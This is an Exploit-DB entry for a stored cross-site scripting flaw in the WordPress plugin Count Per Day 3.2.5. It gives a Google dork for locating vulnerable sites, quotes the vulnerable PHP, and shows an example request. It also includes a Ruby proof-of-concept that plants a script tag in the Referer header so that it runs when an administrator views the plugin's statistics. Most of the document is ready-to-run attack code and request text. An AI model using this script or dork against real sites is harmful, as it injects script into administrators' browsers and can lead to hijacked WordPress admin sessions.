WordPress Plugin Count Per Day 3.2.5 - 'counter.php' Cross-Site Scripting

EDB-ID:

24859

CVE:





Platform:

PHP

Date:

2013-03-19


#!/usr/bin/ruby
# Exploit Title: WordPress Count per Day 3.2.5 CSRF
# Google Dork: inurl:"/wp-content/plugins/count-per-day
# Date: 18.03.2013
# Exploit Author: m3tamantra (http://m3tamantra.wordpress.com/blog)
# Vendor Homepage: http://wordpress.org/extend/plugins/count-per-day/
# Software Link: http://downloads.wordpress.org/plugin/count-per-day.3.2.5.zip
# Version: 3.2.5
# Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli)
# 
#
# Because this is my first Vulnerability I ever found by my self, I wrote a PoC script
# I know that this is overkill and the Vulnerability is trivial to exploit :P
# The JavaScript Payload is executed when the Admin views Count per Day - Statistics
#
# Note: Like the name says "Count per Day" will only count an Visitor one time per Day per Page
#  $date = date_i18n('Y-m-d');
#  // new visitor on page?
#  $count = $this->mysqlQuery('var', $wpdb->prepare("SELECT COUNT(*) FROM $wpdb->cpd_counter WHERE ip=$this->aton(%s) AND date=%s AND page=%d", $userip, $date, $page), 'count check '.__LINE__);
#
##########################################
### counter.php (Vulnerable Code part) ###
###############################################################################################################
#  120         $referer = ($this->options['referers'] && isset($_SERVER['HTTP_REFERER'])) ? $_SERVER['HTTP_REFERER'] : '';
#  ...
#  ...
#  139                 $this->mysqlQuery('', $wpdb->prepare("INSERT INTO $wpdb->cpd_counter (page, ip, client, date, referer)
#  140                 VALUES (%s, $this->aton(%s), %s, %s, %s)", $page, $userip, $client, $date, $referer), 'count insert '.__LINE__);
################################################################################################################
#
### Example Request ############################################################################
# GET /wordpress/ HTTP/1.1
# Accept-Encoding: gzip;q=1.0,deflate;q=0.6,identity;q=0.3
# Accept: */*
# User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:19.0) Gecko/20100101 Firefox/19.0
# Referer: https://boards.4chan.org/b/<script>alert(666)</script>
# Connection: close
# Host: 127.0.0.1:9001
################################################################################################

require "net/http"
require "uri"

if(ARGV.length == 1)
    uri = URI.parse(ARGV[0])
    http = Net::HTTP.new(uri.host, uri.port)
    #http.set_debug_output($stderr)
    request = Net::HTTP::Get.new(uri.request_uri)
    request["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:19.0) Gecko/20100101 Firefox/19.0"
    request["Referer"] = "https://boards.4chan.org/b/<script>alert(666)</script>"
    http.request(request)
    puts "Have a nice day :-)"
else
    puts "Usage:\t\truby #{__FILE__} [WordPress URL]"
    puts "Example:\truby #{__FILE__} http://127.0.0.1/wordpress/?p=1\n"
end